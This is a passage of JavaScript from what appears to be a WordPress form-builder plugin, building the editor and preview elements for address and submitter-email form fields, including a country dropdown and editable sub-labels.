	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr7);
	//edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_address');

//show table

	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_address");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
  var adding_country= document.createElement("input");
  adding_country.setAttribute("type", "hidden");
  adding_country.setAttribute("name", i+"_disable_fieldsform_id_temp");
  adding_country.setAttribute("id", i+"_disable_fieldsform_id_temp");	
  adding_country.setAttribute("street1", w_disabled_fields[0]);
  adding_country.setAttribute("street2", w_disabled_fields[1]);
  adding_country.setAttribute("city", w_disabled_fields[2]);
  adding_country.setAttribute("state", w_disabled_fields[3]);
  adding_country.setAttribute("postal", w_disabled_fields[4]);
  adding_country.setAttribute("country", w_disabled_fields[5]);
	    
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
  var div_for_editable_labels = document.createElement('div');
  div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
  edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");
  div_for_editable_labels.appendChild(edit_labels);
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var div_address = document.createElement('div');
           	div_address.setAttribute("id", i+"_div_address");
			div_address.style.cssText = "width:"+w_size+"px";
		
      	var span_addres1 = document.createElement('span');
			span_addres1.style.cssText = "float:left; width:100%;  padding-bottom: 8px; display:block";
			
      	var span_addres2 = document.createElement('span');
			span_addres2.style.cssText = "float:left; width:100%;  padding-bottom: 8px; display:block";
			
      	var span_addres3_1 = document.createElement('span');
			span_addres3_1.style.cssText = "float:left; width:48%; padding-bottom: 8px;";
		
      	var span_addres3_2 = document.createElement('span');
			span_addres3_2.style.cssText = "float:right; width:48%; padding-bottom: 8px;";
		
      	var span_addres4_1 = document.createElement('span');
			span_addres4_1.style.cssText = "float:left; width:48%; padding-bottom: 8px;";
		
      	var span_addres4_2 = document.createElement('span');
			span_addres4_2.style.cssText = "float:right; width:48%; padding-bottom: 8px;";
		
	
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      
	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
		if(w_required=="yes")
			required.innerHTML = " *";	
			
	var street1 = document.createElement('input');
        street1.setAttribute("type", 'text');
	    street1.style.cssText = "width:100%";
	    street1.setAttribute("id", i+"_street1form_id_temp");
	    street1.setAttribute("name", i+"_street1form_id_temp");
	    street1.setAttribute("onChange", "change_value('"+i+"_street1form_id_temp')");
			
	var street1_label = document.createElement('label');
	    street1_label.setAttribute("class", "mini_label");
      street1_label.setAttribute("id", i+"_mini_label_street1");
	    street1_label.style.cssText = "display:block;";
	    street1_label.innerHTML=w_mini_labels[0];
			
	var street2 = document.createElement('input');
        street2.setAttribute("type", 'text');
		street2.style.cssText = "width:100%";
		street2.setAttribute("id", i+"_street2form_id_temp");
	   	street2.setAttribute("name", (parseInt(i)+1)+"_street2form_id_temp");
		street2.setAttribute("onChange", "change_value('"+i+"_street2form_id_temp')");

	var street2_label = document.createElement('label');
		street2_label.setAttribute("class", "mini_label");
    street2_label.setAttribute("id", i+"_mini_label_street2");
    street2_label.style.cssText = "display:block;";
		street2_label.innerHTML=w_mini_labels[1];
		
	var city = document.createElement('input');
        city.setAttribute("type", 'text');
		city.style.cssText = "width:100%";
		city.setAttribute("id", i+"_cityform_id_temp");
	   	city.setAttribute("name", (parseInt(i)+2)+"_cityform_id_temp");
		city.setAttribute("onChange", "change_value('"+i+"_cityform_id_temp')");

	var city_label = document.createElement('label');
		city_label.setAttribute("class", "mini_label");
    city_label.setAttribute("id", i+"_mini_label_city");
    city_label.style.cssText = "display:block;";
		city_label.innerHTML= w_mini_labels[2];
			
	var state = document.createElement('input');
        state.setAttribute("type", 'text');
		state.style.cssText = "width:100%";
		state.setAttribute("id", i+"_stateform_id_temp");
	   	state.setAttribute("name", (parseInt(i)+3)+"_stateform_id_temp");
		state.setAttribute("onChange", "change_value('"+i+"_stateform_id_temp')");

	var state_label = document.createElement('label');
		state_label.setAttribute("class", "mini_label");
    state_label.setAttribute("id", i+"_mini_label_state");
    state_label.style.cssText = "display:block;";
		state_label.innerHTML = w_mini_labels[3];
			


	var postal = document.createElement('input');
        postal.setAttribute("type", 'text');
		postal.style.cssText = "width:100%";
		postal.setAttribute("id", i+"_postalform_id_temp");
	   	postal.setAttribute("name", (parseInt(i)+4)+"_postalform_id_temp");
		postal.setAttribute("onChange", "change_value('"+i+"_postalform_id_temp')");

	var postal_label = document.createElement('label');
		postal_label.setAttribute("class", "mini_label");
    postal_label.setAttribute("id", i+"_mini_label_postal");
    postal_label.style.cssText = "display:block;";
		postal_label.innerHTML=w_mini_labels[4];
			
	var country = document.createElement('select');
        country.setAttribute("type", 'text');
		country.style.cssText = "width:100%";
		country.setAttribute("id", i+"_countryform_id_temp");
	   	country.setAttribute("name", (parseInt(i)+5)+"_countryform_id_temp");
		country.setAttribute("onChange", "change_value('"+i+"_countryform_id_temp')");

	var country_label = document.createElement('label');
		country_label.setAttribute("class", "mini_label");
    country_label.setAttribute("id", i+"_mini_label_country");
    country_label.style.cssText = "display:block;";
		country_label.innerHTML=w_mini_labels[5];
			
		
		var option_ = document.createElement('option');
			option_.setAttribute("value", "");
			option_.innerHTML="";
		country.appendChild(option_);
		
		coutries=["Afghanistan","Albania",	"Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombi","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepa","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe"];	
		for(r=0;r<coutries.length;r++)
		{
		var option_ = document.createElement('option');
			option_.setAttribute("value", coutries[r]);
			option_.innerHTML=coutries[r];
		country.appendChild(option_);
		}









	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
		

      	span_addres1.appendChild(street1);
      	span_addres1.appendChild(street1_label);
		
       	span_addres2.appendChild(street2);
      	span_addres2.appendChild(street2_label);
		
    	span_addres3_1.appendChild(city);		
      	span_addres3_1.appendChild(city_label);
    	span_addres3_2.appendChild(state);		
      	span_addres3_2.appendChild(state_label);
		
		
    	span_addres4_1.appendChild(postal);		
      	span_addres4_1.appendChild(postal_label);
    	span_addres4_2.appendChild(country);		
      	span_addres4_2.appendChild(country_label);
		
		
		if(w_disabled_fields[0]=="no")
			div_address.appendChild(span_addres1);
		if(w_disabled_fields[1]=="no")
			div_address.appendChild(span_addres2);	
		if(w_disabled_fields[2]=="no")
			div_address.appendChild(span_addres3_1);	
		if(w_disabled_fields[3]=="no")
			div_address.appendChild(span_addres3_2);
		if(w_disabled_fields[4]=="no")
			div_address.appendChild(span_addres4_1);
		if(w_disabled_fields[5]=="no")		
			div_address.appendChild(span_addres4_2);
		
		
       	td2.appendChild(adding_type);
       	td2.appendChild(adding_required);
        td2.appendChild(adding_country);
        td2.appendChild(div_address);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
        div.appendChild(div_for_editable_labels);
      	main_td.appendChild(div);
		
	if(w_field_label_pos=="top")
				label_top(i);
  change_class(w_class, i);
  refresh_attr(i, 'type_address');
  jQuery(document).ready(function() {		
    jQuery("label#"+i+"_mini_label_street1").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var street1 = "<input type='text' class='street1' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(street1);		
        jQuery("input.street1").focus();
        jQuery("input.street1").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_street1").text(value);
          document.getElementById('el_street1_label').innerHTML = value;
        });
      }
    });
    jQuery("label#"+i+"_mini_label_street2").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var street2 = "<input type='text' class='street2'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(street2);
        jQuery("input.street2").focus();
        jQuery("input.street2").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_street2").text(value);
          document.getElementById('el_street2_label').innerHTML = value;
        });		
      }	
    });
    jQuery("label#"+i+"_mini_label_city").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var city = "<input type='text' class='city'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(city);
        jQuery("input.city").focus();
        jQuery("input.city").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_city").text(value);
          document.getElementById('el_city_label').innerHTML = value;
        });
      }
    });
    jQuery("label#"+i+"_mini_label_state").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var state = "<input type='text' class='state'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(state);
        jQuery("input.state").focus();
        jQuery("input.state").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_state").text(value);
          document.getElementById('el_state_label').innerHTML = value;
        });	
      }
    });
    jQuery("label#"+i+"_mini_label_postal").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var postal = "<input type='text' class='postal'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(postal);
        jQuery("input.postal").focus();
        jQuery("input.postal").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_postal").text(value);
          document.getElementById('el_postal_label').innerHTML = value;
        });
      }
    });
    jQuery("label#"+i+"_mini_label_country").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var country = "<input type='text' class='country'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(country);
        jQuery("input.country").focus();
        jQuery("input.country").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_country").text(value);
          document.getElementById('el_country_label').innerHTML = value;
        });	
      }	
    });
	});
}

function type_submitter_mail(i, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_send, w_required, w_unique, w_class, w_attr_name, w_attr_value){
    document.getElementById("element_type").value="type_submitter_mail";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
	                el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
		el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		   
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");

	var el_first_value_label = document.createElement('label');
	        el_first_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_first_value_label.innerHTML = "Value if empty";
	
	var el_first_value_input = document.createElement('input');
                el_first_value_input.setAttribute("id", "el_first_value_input");
                el_first_value_input.setAttribute("type", "text");
                el_first_value_input.setAttribute("value", w_title);
                el_first_value_input.style.cssText = "width:150px;";
                el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp')");
				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	
	var el_send_label = document.createElement('label');
	        el_send_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_send_label.innerHTML = "Send mail to submitter ";
	
	var el_send = document.createElement('input');
                el_send.setAttribute("id", "el_send");
                el_send.setAttribute("type", "checkbox");
                el_send.setAttribute("value", "yes");
                el_send.setAttribute("onclick", "set_send('"+i+"_sendform_id_temp')");
	if(w_send=="yes")
			
                el_send.setAttribute("checked", "checked");
	
	
	
	
	
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");

	var el_unique_label = document.createElement('label');
	    el_unique_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_send");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("value", "yes");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
			
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);

	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_send_label);
	edit_main_td6_1.appendChild(el_send);
	
	edit_main_td7.appendChild(el_required_label);
	edit_main_td7_1.appendChild(el_required);
	
	edit_main_td9.appendChild(el_unique_label);
	edit_main_td9_1.appendChild(el_unique);
	
	edit_main_td8.appendChild(el_attr_label);
	edit_main_td8.appendChild(el_attr_add);
	edit_main_td8.appendChild(br4);
	edit_main_td8.appendChild(el_attr_table);
	edit_main_td8.setAttribute("colspan", "2");
	
/*	edit_main_td5.appendChild(el_guidelines_label);
	edit_main_td5.appendChild(br4);
	edit_main_td5.appendChild(el_guidelines_textarea);
*/	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr8);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table

	element='input';	type='text'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_submitter_mail");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
	    
	var adding_send = document.createElement("input");
            adding_send.setAttribute("type", "hidden");
            adding_send.setAttribute("value", w_send);
            adding_send.setAttribute("name", i+"_sendform_id_temp");
            adding_send.setAttribute("id", i+"_sendform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
			
	var adding = document.createElement(element);
            adding.setAttribute("type", type);
		
		
		if(w_title==w_first_val)
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_deactive");
		}
		else
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_active");
		}
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.setAttribute("value", w_first_val);
			adding.setAttribute("title", w_title);
			
			adding.setAttribute("onFocus", "delete_value('"+i+"_elementform_id_temp')");
			adding.setAttribute("onBlur", "return_value('"+i+"_elementform_id_temp')");
			adding.setAttribute("onChange", "change_value('"+i+"_elementform_id_temp')");
			

     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
